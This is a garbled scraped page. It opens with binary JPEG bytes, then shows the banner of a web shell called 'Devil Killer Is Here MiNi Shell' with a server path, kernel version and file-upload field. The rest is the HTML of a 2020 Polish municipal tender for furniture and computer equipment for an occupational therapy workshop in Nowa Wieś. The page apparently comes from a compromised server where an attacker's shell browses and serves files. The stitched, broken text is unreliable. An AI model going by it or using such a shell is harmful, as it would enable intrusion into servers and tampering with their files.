JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20201009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20201009/595684-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 595684-N-2020 z dnia 2020-10-09 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Miasto i Gmina Piotrków Kujawski</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">“Wyposażenie pracowni dla WTZ w Nowej Wsi” realizowane w Programie wyrównywania różnic między regionami III” obszar „F”- Remont, Modernizacja Warsztatów Terapii Zajęciowej poprzez zakup doposażenia.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Miasto i Gmina Piotrków Kujawski</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">91086666600000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Kościelna</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">88-230</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Piotrków Kujawski</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">kujawsko-pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">542 655 123, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zpos@piotrkowkujawski.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">542 655 112</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.piotrowkujawski.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Ofertę należy złożyć w forme pisemnej osobiście, za pomocą kuriera, za pomocą operatora pocztowego.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Miasto i Gmina Piotrków Kujawski, 88-230 Piotrków Kujawski, ul. Kościelna 1, pokój nr 12 ( sekretariat).</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">“Wyposażenie pracowni dla WTZ w Nowej Wsi” realizowane w Programie wyrównywania różnic między regionami III” obszar „F”- Remont, Modernizacja Warsztatów Terapii Zajęciowej poprzez zakup doposażenia.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.6.2020.TC</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci">Wykonawca może składać ofertę na wszystkie lub wybrane przez siebie części zamówienia.</span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">Wykonawca może składać ofertę na wszystkie lub wybrane przez siebie części zamówienia.</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">2.	Przedmiotem zamówienia jest zakup niżej wymienionego wyposażenia pracowni WTZ realizowanego w ramach zadania inwestycyjnego pn.: „Wyposażenie pracowni dla WTZ w Nowej Wsi”:a)	Część I zamówienia: Zakup oraz montaż mebli i krzeseł jako doposażenia do pomieszczeń WTZ. Przedmiotem zamówienia jest dostawa niżej wymienionych mebli i krzeseł:L.p.	Nazwa elementu doposażenia - Meble	Ilość w szt.1	2	31	Szafa przesuwna (wym. 285 cm x 235 cm x 60 cm) z półkami, szufladami i lustrem, drzwi przesuwne, gr. 18 mm, płyta laminowana, kolor bordowy U2656 PE	12	Szafa przesuwna (wym. 260 cm x 300 cm x 57 cm) z półkami, na drzwiach przesuwnych lustra, kolor Dąb Sonoma, płyta laminowana, gr. 18 mm	13	Szafa przesuwna na dokumentację (wym. 230 cm x 140 cm x 50 cm) z pólkami, na drzwiach przesuwnych lustra, kolor jaśminowy, gr. 18 mm, płyta laminowana	14	Szafa przesuwna (wym. 260 cm. x 180 cm x 60 cm) z półkami, kolor Jesion Werona, płyta laminowana	15	Szafa przesuwna (wym. 260 cm x 130 cm x 60 cm) z półkami, miejscem na powieszenie garderoby, drzwi przesuwne z lustrami, kolor Jesion Werona, płyta laminowana	16	Szafa przesuwna (wym. 270 cm x 300 cm x 60 cm) z półkami, 18 mm, płyta laminowana, dąb san marino	17	Szafa przesuwna (wy. 270 cm x 120cm x 60 cm), płyta laminowana, 18 mm, dąb cortona	18	Szafa z drzwiami uchylnymi (wym. 197 cm x 55 cm x 60 cm) z półką od góry i częścią przeznaczoną na przybory do sprzątania, dąb sonoma, gr 18 mm	19	Szafa ubraniowa (wym. 200 cm x 140 cm x 45 cm) z lustrem, dąb sonoma 110	Segment – szafa + regał (wym. 260 cm x 530 cm x 60 cm), lustro na drzwiach przesuwnych, klon naturalny, 18 mm	111	Komoda z szufladami oraz częścią z półkami zamykanymi drzwiami (wym. 110 cm x 280 cm x 60 cm), , dąb sonoma, gr.18mm	112.	Komoda-część szuflad oraz część półek (wym. 85cm x 60 cm x 60 cm), olcha jaśminowy ,gr 18mm	113	Szafka wisząca (wym. 85 cm x 60 cm x 60 cm) z półkami oraz drzwiami, kolor Jesion Wrona, gr 18 mm, płyta laminowana 114	Komoda (wym. 85 cm x 145 cm x 60 cm), część komody z szufladami, część z wysuwanym koszem, kolor jesion Werona, gr 18 mm, płyta laminowana	115	Szafka (wym. 86 cm x 60 cm x 67 cm), dąb sonoma, gr 18mm	116	Szafka z szufladą (wym. 85 cm x 60 cm x 60 cm), dąb cortona, 18 mm, płyta laminowana	117	Szafka na buty (wym. 50 cm x 150 cm x 30 cm), dąb sonoma, gr. 18mm płyta laminowana	118	Szafka na buty (wym. 50 cm x 310 cm x 35 cm)	119	Wieszak na płycie (wym. 110 cm x 150 cm), dąb sonoma, gr 18mm	120	Wieszak na płycie (wym. 110 cm x 155 cm) dąb sonoma, gr 18mm	121	Wieszak na płycie (wym. 110 cm x 310 cm) dąb sonoma, gr 18mm	122	Panel na stanowiska komputerowe z szufladami i gniazdami do kabli (wym. 78 cm x 425 cm x 60 cm), kolor Jesion Werona, gr. 3,6 cm, płyta laminowana	123	Panel roboczy (wym. 78 cm x 180 cm x 60 cm)jesion Verona, gr.3,6cm, płyta laminowana	124	Blat (wym. 240 cm x 100 cm), klon naturalny, gr 3,6cm płyta laminowana	125	Biurko narożne z szufladami na zamek centralny (wym. 150 cm x 150 cm x 76 cm), kolor Jesion Werona, płyta 18 mm, płyta laminowana	126	Nadstawka na dokumenty- szafka wisząca nad biurko (wym. 50 cm x 80 cm x 30 cm) – dwie otwarte półki na segregatory, kolor Jesion Werona, płyta laminowanagr.18mm	127	Biurko narożne z szufladami na zamek centralny (wym. 120 cm x 130 cm x 78 cm), 3,6, dąb cortona, gr. 18mm płyta laminowana	128	Biurko z szufladami na zamek centralny (wym. 120 cm x 60 cm x 76 cm wys.), dąb sonoma,gr.18mm płyta laminowana	129	Biurko narożne z szufladami na zamek centralny (wym. 140 cm x 160 cm x 76 cm wys.), klon naturalny	130	Biurko narożne z szufladami na zamek centralny (wym. 140 cm x 140 cm x 76 cm wys.), płyta laminowana, 18 mm, kolor jesion werona	131	Biurko narożne z szufladami na zamek centralny (wym. 150 cm x 170 cm x 78 cm wys.), kolo dąb san marino, gr 18, płyta kaminowana	132	Zabudowa meblowa do jadalni (wym. 86 cm x 550 cm x 50 cm), kolor jesion Werona, 18 mm, płyta laminowana	133	Zestaw mebli kuchennych (wym. 86 cm x 240 cm x 50 cm), jaśminowe cappucino, gr 18,pyta laminowana	134	Stół (wym. 100 cm x 220 cm x 80 cm), 3,6, kolor dąb san marino gr3,6cm płyta laminowana	135	Stół do narad (wym. 280 cm x 90 cm), gr 3,6 cm, kolor Olcha, płyta laminowana	136	Stolik do jadalni (wym. 100 cm x 260 cm x 80 cm), kolor jesion Werona, gr 3,6 płyta laminowana	137	Stolik do jadalni (wym. 100 cm x 278 cm x 80 cm), kolor jesion Werona, gr 3,6, płyta laminowana	138	Stół roboczy (wym. 180 cm x 240 cm x 80 cm), nogi chromowane, gr 3,6, jaśminowy cappuccino, płyta laminowana	139	Stół (wym. 100 cm x 210 cm x 80 cm), kolor Jesion Werona, grubość 3,6 cm, płyta laminowana	140	Stół (wym. 90 cm x 120 cm x 80 cm), kolor dąb sonoma	241	Krzesła do pracowni - tapicerowane, stelaż chromowany metalowy lub malowany proszkowo (wym. Siedzisko 41,5 cmx 47,5 cm, oparcie 3,5 cm x 54,5 cm, wysokość podłoża do siedziska 47 cm)	3242	Krzesła do Sali narad wykonane z ekoskóry, stelaż ze stali malowanej proszkowo (50 cm wys. 60 cm szer., siedzisko 42 cm x 43 cm)	1243	Krzesła biurowe - siedzisko piankowe obłożone ekoskórą, wyprofilowane oparcie, podłokietniki, noga stal chromowana na kółkach, regulacja poprzez amortyzator gazowy, funkcja bujania mechanizm TILT (wym. Rozpiętość ramion podstawy 70 cm, wys. Siedziska od podłoża regulowana 50-58 cm, wys. Podłokietnika od ziemi 78-87 cm, wys. Oparcia 62 cm, głębokość siedziska 50 cm, szer. Siedziska 55 cm, szerokość siedziska z podłokietnikami 70 cm waga 20 kg)	544	Krzesła biurowe (wykonane z ekoskóry, z funkcją leżanki, regulacja odchylenia oparcia, poduszka pod lędźwie, kółka gumowe, pneumatyczna regulacja wysokości)	2Przedmiot zamówienia obejmuje dostawę wraz z montażem dostarczonych mebli w pomieszczeniach wskazanych przez Zamawiającego.b)	Część II zamówienia: Zakup sprzętu elektronicznego jako doposażenia do pomieszczeń WTZ. Przedmiotem zamówienia jest dostawa niżej wymienionego sprzętu:L.p.	Nazwa elementu doposażenia Zakup sprzętu elektronicznego	Ilość w szt.1	2	31	Laptop (Procesor Intel-Corei 5-8250U, pamięć 8 GB ram, Dysk SSD 256 GB, Windows 10, Karta Graficzna GE FORCE MIC 150 2 GB pamięci, ekran 15,6’’ HD, 1366x768 /BT/)	102	Myszka Bezprzewodowa	53	Procesor – i5-8400, Pamięć- 8GB, dysk SSD 256GB, System operacyjny Windows 10 Home PL (wersja 64 bitowa),Monitor z ekranem o przekątnej 24” HD ( 1366x768 ),Karta dźwiękowa – zintegrowana, Karta graficzna	- zintegrowana, Klawiatura Numeryczna, Myszka przewodowa.	14	Drukarka Laserowa (funkcje drukowania, faksowania, maksymalny rozmiar papieru A4, pamięć przynajmniej 64 MB, procesor 600 MHz, technologia laserowa, połączenie – lokalny interfejs Hi-Speed USB 2.0, sieć bezprzewodowa interfejs 10 Base – T/100 Base – TX, kopiowanie 30 k/min, współczynnik zmniejszania lub zwiększania rozmiaru dokumentu od 25% do 400% z skokiem co 1%, kopiowanie dwustronne, skanowanie dwustronne, rozdzielczość 1.200x1.200 dpi z szyby skanera, do 600x600 (DF), pojemnik na papier stacjonarny 250 arkuszy.	15	Drukarka – urządzenie wielofunkcyjne (technologia druku, atramentowa (kolorowa), podajnik papieru – 250 arkuszy, wydajność – 30 000 str/mies, rozdzielczość w czerni 1200 x 1200 dpi, rozdzielczość w kolorze 4800x1200 dpi, szybkość druku w czerni 34 str/min, szybkość druku w kolorze 34 str/min, druk dwustronny – automatyczny, obsługiwane formaty nośników A3, A4,A5,A46,B5 (JIS), koperty (DL, koperty C5)	16	Radiomagnetofon – odtwarzacz płyt CD-Audio, CD-R/RW, obsługa formatu MP3, wbudowane radio analogowe z pamięcią FM,UKF,3D, typ kolumn:szerokopasmowy bass reflex, regulacja tonów, korektor dźwięku, system dźwięku przestrzennego, podbicie basu, Wi-Fi, DLNA, bluetooth, USB, złącze EURO, USB, HDMI, wyjście słuchawkowe, wejście mikrofonowe, wyjście do aktywnego subwoofera, zasilane 220-240 V, 50/60 HZ	17	Telewizor 70’’ – technologia QLED 4Kuhd, pełny smart TV, WiFi, DLNA, przeglądarka internetowa, nagrywanie na USB, Bluetooth, WiFi Direct, funkcje smart TV – SmartHub, Apps, SmartThings, Remote Access, Facebook, Netflix, Youube, Asystent Google, Amazon Alexa, Bixby, wyszukiwanie głosowe, USB - zdjęcia, muzyka, film, Digital EPG, PVR - nagrywanie USB, TimeShift, możliwość aktualizacji oprogramowania, możliwość użycia klawiatury i myszki (funkcje Smart), Anynet+, Tryb Ambient, Menu w języku polskim, Telegazeta	18	Kamera - DSP: NT96658, Rozmiar: TFT 3.0 cala, Czujnik: 1 / 3,2 ”cmos 8 megapikseli maksymalnie 24 megapiksele, Lense: Lense, Zakres ogniskowania: 0,5 m – nieskończony, WIFI: Wsparcie, Rozmiar obrazu: Format: JGP Definiton : 24M, 20M, 16M, 12M, 10M, 8M, 5M, 3M, 2M	19	Aparat fotograficzny - Lustrzanka cyfrowa, rozdzielczość: wielkość matrycy APS-C, ,rodzaj przetwornika- CMOS 22,3X14,9 mm, rozdzielczość 24,1Mpix, zapis na kartach pamieci SD, SDHC, SDXC, zapis zdjęć RAW, JPEG, maksymalna wielkość zapisywanego zdjęcia 6000x4000 pikseli, nagrywanie filmów- full HD ( 199=29x1080),tryb pomiaru- punktowy, wielopunktowy, centralnie- ważony, ręczne usuwanie ekspozycji, preselekcja czasu TV, preselekcja przesłony AV, automatyka programowa, automatyczny bracketing ekspozycji, korekcja ekspozycji+/-5 EV, czas otwarcia migawki 30-1/4000s,zdjęcia selekcyjne 3kl/s, zakres czułości ISO-100-12800,automatyczne ustawienie czułości i ostrości, liczba pól autofocusu-9, Tryb AF automatyczny w trybie ciągłym, w trybie pojedynczym ręczny, balans bieli automatyczny, ręczny, samowyzwalacz, wbudowana lampa błyskowa, możliwość podłączenia zewnętrznej lamy błyskowej	110	Ploter - Wyposażony w programy umożliwiające łatwe tworzenie własnych projektów oraz import rysunków z popularnych programów graficznych, maszyna do laserowego rysowania i wycinania oraz grawerowania drewna skóry i innych mat. wyposażony w: rolki dociskowe, panel LCD z modułem sterującym, który pozwoli zmieniać parametry pracy w czasie rzeczywistym, ustawić pozycje noża, przesunąć materiał do cięcia, ustawić prędkość ciecia, ustawić siłę ciecia,rodzaje noży do cięcia: standardowe ostrza Roland, poruszanie głowicami; silnik krokowy, USB i port szeregowy, maksymalna szerokość cięcia 254mm,szerokość materiału 356mm,maksymalny nacisk 500g maksymalna prędkość 800mm/s, pamięć 4MB,zasilanie 230vAC50/60Hz	111	Rzutnik - wysoka jakość i wydajność: technologia 3LCD, tradycyjny format 4:3 XGA, jasność 3400 ANSI 